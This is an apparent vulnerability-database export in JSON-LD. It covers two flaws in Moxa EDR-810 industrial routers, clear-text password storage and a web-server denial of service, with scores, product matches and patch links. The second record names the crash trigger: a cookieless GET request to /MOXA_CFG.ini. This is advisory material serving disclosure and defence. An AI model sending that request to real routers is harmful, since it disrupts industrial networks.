Vulnerability from variot - Updated: 2023-12-18 13:13A password storage vulnerability exists in the operating system functionality of Moxa EDR-810 V4.1 build 17030317. An attacker with shell access could extract passwords in clear text from the device. Moxa EDR-810 Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0126",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12127"
}
]
},
"cve": "CVE-2017-12127",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12127",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-11726",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-102618",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "talos-cna@cisco.com",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12127",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12127",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12127",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-11726",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1626",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-102618",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "VULHUB",
"id": "VHN-102618"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A password storage vulnerability exists in the operating system functionality of Moxa EDR-810 V4.1 build 17030317. An attacker with shell access could extract passwords in clear text from the device. Moxa EDR-810 Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "VULHUB",
"id": "VHN-102618"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0479",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-12127",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11726",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97227",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102618",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "VULHUB",
"id": "VHN-102618"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"id": "VAR-201805-0126",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "VULHUB",
"id": "VHN-102618"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
}
]
},
"last_update_date": "2023-12-18T13:13:54.236000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "MoxaEDR-810 password storage vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132227"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=99948"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102618"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0479"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12127"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12127"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0479"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "VULHUB",
"id": "VHN-102618"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"db": "VULHUB",
"id": "VHN-102618"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102618"
},
{
"date": "2018-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"date": "2018-05-14T20:29:00.517000",
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11726"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102618"
},
{
"date": "2018-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013430"
},
{
"date": "2022-12-09T01:49:32.077000",
"db": "NVD",
"id": "CVE-2017-12127"
},
{
"date": "2022-12-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Vulnerabilities related to certificate and password management",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013430"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1626"
}
],
"trust": 0.6
}
}
VAR-201805-0140
Vulnerability from variot - Updated: 2023-12-18 13:08An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA_CFG.ini" without a cookie header to trigger this vulnerability. Moxa EDR-810 Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0140",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14435"
}
]
},
"cve": "CVE-2017-14435",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14435",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11732",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105157",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14435",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14435",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14435",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11732",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-810",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105157",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "VULHUB",
"id": "VHN-105157"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to \"/MOXA\\_CFG.ini\" without a cookie header to trigger this vulnerability. Moxa EDR-810 Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "VULHUB",
"id": "VHN-105157"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0474",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-14435",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11732",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105157",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "VULHUB",
"id": "VHN-105157"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"id": "VAR-201805-0140",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "VULHUB",
"id": "VHN-105157"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
}
]
},
"last_update_date": "2023-12-18T13:08:30.347000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Denial of Service Vulnerability (CNVD-2018-11732)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132245"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190041"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105157"
},
{
"db": "JVNDB",
